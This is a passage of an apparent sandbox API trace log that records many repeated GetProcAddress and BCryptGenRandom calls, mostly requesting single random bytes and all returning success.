(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018a9, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a018a9) returned 0x0 [0275.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018bb, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a018bb) returned 0x0 [0275.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018dc, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a018dc) returned 0x0 [0275.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.928] BCryptGenRandom (in: hAlgorithm=0x0, 